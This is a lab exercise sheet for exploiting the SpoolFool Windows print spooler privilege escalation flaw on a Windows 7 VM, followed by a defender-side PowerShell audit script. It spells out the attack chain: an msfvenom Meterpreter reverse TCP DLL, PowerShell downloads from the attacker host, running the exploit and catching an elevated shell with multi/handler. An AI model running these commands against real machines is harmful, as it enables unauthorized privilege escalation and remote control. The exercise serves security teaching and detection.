SpoolFool Exploit

Exercise: Exploiting Windows Machine via SpoolFool Vulnerability

Objective: To demonstrate how to exploit a Windows machine via SpoolFool vulnerability and gain a reverse shell with escalated privileges.

Learning Outcomes:

  • Download and set up SpoolFool PoC on Kali Linux machine
  • Compromise Windows 7 machine and gain a reverse shell
  • Use msfvenom to create a custom DLL and upload it to the Windows 7 machine
  • Run the SpoolFool exploit to write the DLL to the print driver directory, causing privilege escalation
  • Start multi/handler in msfconsole and have a meterpreter session on the Windows 7 machine with escalated privileges
  • Understand how to exploit a Windows machine using SpoolFool vulnerability
  • Understand the importance of performing these exercises in a controlled and secure lab environment
  • Understand the difference between a reverse shell and privilege escalation
  • Understand how to use msfvenom to create a custom DLL
  • Understand how to use a multi/handler in msfconsole
  • Understand how to check the current user’s permissions

Prerequisites:

  • A Windows 7 machine in a virtual environment (VirtualBox)
  • A Kali Linux machine in a virtual environment (VirtualBox)
  • A working internet connection
  • SpoolFool PoC (https://github.com/ly4k/SpoolFool) downloaded on the Kali Linux machine

Steps:

  1. First, download the PoC created by Oliver Lyak from the GitHub link given in the Prerequisites.
  2. Open a terminal in Kali Linux and navigate to the directory where you have downloaded the SpoolFool files.
  3. Use the command ls to list the files in the directory. You should see an EXE file and a pre-made DLL payload.
  4. Next, compromise the Windows 7 machine and gain a reverse shell. Use any method of your choice, such as Metasploit or manual exploitation. Once you have a reverse shell, check the current user's permissions by running whoami /user /groups, and keep this output for comparison in step 11.
  5. Now create a custom DLL with msfvenom. For this exercise the payload is a 64-bit Meterpreter reverse TCP payload. Run msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll LHOST=IP_of_kali_machine LPORT=9501 > reverse_64bit.dll (replace IP_of_kali_machine with the IP address of your Kali Linux machine).
  6. Once the DLL is generated, upload it to the Windows 7 machine; we recommend the C:\Users\Public directory. Start a Python HTTP server on Kali that serves SpoolFool.exe and reverse_64bit.dll from the same location, then fetch both files with the PowerShell cmdlet Invoke-WebRequest (alias iwr): powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf \Users\Public\reverse.dll and powershell -c iwr http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe (replace IP_of_kali_machine with the IP address of your Kali Linux machine).
  7. Now run the exploit with SpoolFool.exe -dll reverse.dll in the command prompt on the Windows 7 machine. Before running this command, make sure multi/handler is set up in msfconsole: use multi/handler, set payload windows/x64/meterpreter/reverse_tcp, set LHOST IP_of_kali_machine and set LPORT 9501.
  8. Once the exploit has executed, you will notice that a new directory has been created in %temp%\d5f5….{random name} and that a reparse point has been created so that writes are redirected into the print driver directory C:\Windows\system32\spool\DRIVERS\x64\4.
  9. That directory should now exist with the DLL saved in it, indicating a successful exploit. You should also see that the directory is writable by Everyone.
  10. Finally, start the multi/handler in msfconsole with the command run.
  11. You should now have a Meterpreter session on the Windows 7 machine. Check the current user's permissions again (whoami /user /groups from the session's shell) and compare the output with step 4 to confirm that privileges have been escalated.
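Steps 8 and 9 describe the two artefacts the exploit leaves behind: a driver subdirectory writable by Everyone and a reparse point under %TEMP%. The following PowerShell script is an added defender-side check, not part of the exercise or of the SpoolFool PoC, for verifying a host after the lab (or auditing a fleet). It assumes Windows PowerShell 3.0 or later run from an elevated prompt; the driver path is the one the exercise names, and the list of "broad" principals is the author's choice for this example.

```powershell
# Added defender-side check; not part of the exercise or of the SpoolFool PoC.
# Assumptions: Windows PowerShell 3.0 or later, run from an elevated prompt on the
# lab host; $DriverRoot is the print driver directory the exercise names.
$DriverRoot = 'C:\Windows\System32\spool\DRIVERS\x64\4'

# Principals that should never hold write rights under the driver store
# (chosen for this example; extend to match your own baseline).
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

# Any of these rights lets a caller drop or replace a DLL in the directory.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-WritableDriverDirs {
    # Returns one record per (directory, principal) pair that grants write access.
    param([string]$Root = $DriverRoot)
    if (-not (Test-Path -LiteralPath $Root)) { return }
    $dirs = @(Get-Item -LiteralPath $Root) +
            @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        $acl = Get-Acl -Path $dir.FullName
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Cast to int so generic-rights values outside the enum are still matched.
            if (([int]$ace.FileSystemRights -band [int]$WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $dir.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Get-TempReparsePoints {
    # Step 8 notes the PoC creates a reparse point under %TEMP%; list any that remain.
    Get-ChildItem -LiteralPath $env:TEMP -Directory -ErrorAction SilentlyContinue |
        Where-Object { $_.Attributes -band [System.IO.FileAttributes]::ReparsePoint } |
        Select-Object FullName, LinkType, Target
}

$writable = @(Get-WritableDriverDirs)
if ($writable.Count -eq 0) {
    Write-Output "No broad write access found under $DriverRoot"
} else {
    Write-Output "Directories under $DriverRoot writable by broad principals:"
    $writable | Format-Table -AutoSize
}
Write-Output "Reparse points remaining under $env:TEMP:"
Get-TempReparsePoints | Format-Table -AutoSize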

Note: This exercise is only for educational purposes and should be carried out in a controlled and secured lab environment.

Submission Details:

  • Detailed report of steps taken, including screenshots of commands and their output
  • Specific versions of software used (Windows 7, Kali Linux, SpoolFool PoC)
  • Methodology used to compromise the Windows 7 machine
  • Reasoning behind the choice of payload and listener settings in msfvenom and msfconsole
  • Observations and results of the privilege escalation, such as the before and after permissions of the user and the final meterpreter session
  • Submit the report in PDF format along with any supporting files (custom DLL, log files)
  • Exercise should be performed in a controlled and secured lab environment and should not be attempted on any production or live systems.
